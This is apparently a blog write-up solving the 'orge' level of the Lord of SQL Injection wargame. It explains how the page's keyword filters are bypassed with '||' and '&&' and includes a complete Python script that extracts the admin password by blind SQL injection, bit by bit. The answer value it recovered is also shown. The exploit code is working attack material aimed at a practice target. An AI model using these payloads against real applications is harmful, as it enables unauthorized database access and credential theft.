LOS - orge / level 7Web/SQLI 2024. 6. 23. 19:14
Problem

Solution
```php
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
```

Both filters are applied to the pw parameter. The second one rejects any value containing `or` or `and` (case-insensitive), and the first also blocks `prob`, `_`, `.` and `()`, so the usual `or` / `and` keywords have to be replaced with the `||` / `&&` operators.

The challenge is solved by submitting admin's real pw value, which is not known.

So the pw is extracted with blind SQL injection: the pw string is closed early and rewritten as `' || id='admin' && <condition>#`, and whether `Hello admin` appears in the response tells us whether the condition held. The length of the pw is found first, then each character is recovered bit by bit with `ascii(substr(pw, i, 1)) & 2^n`.
Answer

?pw=7b751aec
Code used

The problem was solved with the following script, written with python requests.

```python
import requests

url = "input your url"      # challenge URL, without the query string
cookie = {}                 # input your cookie (the site's session cookie)
user = "admin"              # id whose pw is extracted; the checks below look for "Hello admin"


def change_bit(array):
    """Convert a list of 8-character bit strings into integers."""
    two_bit_array = []
    for i in range(len(array)):
        two_bit_array.append(int(array[i], 2))
    return two_bit_array


def change_str(array):
    """Convert a list of ASCII codes into a string."""
    result_str = ""
    for i in range(len(array)):
        result_str = result_str + chr(array[i])
    return result_str


def find_length(url, user, cookie):
    """Increase i until length(pw) > i is false; that i is the pw length."""
    i = 1
    while True:
        params = f"?pw=%27%20||%20id=%27{user}%27%20%26%26%20length(pw) > {i}%23"
        send_url = url + params
        print(f"Params = {params}")
        res = requests.get(send_url, cookies=cookie)
        # print(res.text)
        if "Hello admin" not in res.text:
            break
        i += 1
    print(f"{user} Length = {i}")
    return i


def blind(url, user, cookie, length):
    """Recover each character of pw bit by bit with ascii(substr(pw,i,1)) & 2^n."""
    results = []
    for i in range(1, length + 1):
        k = 2
        result = ""
        for count in range(8):
            go = k ** count
            # %26 is '&', so the condition is ascii(substr(pw,i,1)) & go
            params = f"?pw=%27%20||%20id=%27{user}%27%20%26%26%20ascii(substr(pw,{i},1)) %26 {go}%23"
            send_url = url + params
            res = requests.get(send_url, cookies=cookie)
            if "Hello admin" in res.text:
                result = "1" + result   # bit set: prepend so the MSB ends up first
            else:
                result = "0" + result
        print(f"{i} : {result}")
        results.append(result)
    two_bit_array = change_bit(results)
    result_str = change_str(two_bit_array)
    return result_str


print("Find User Length")
length = find_length(url, user, cookie)
array = blind(url, user, cookie, length)
print(array)
```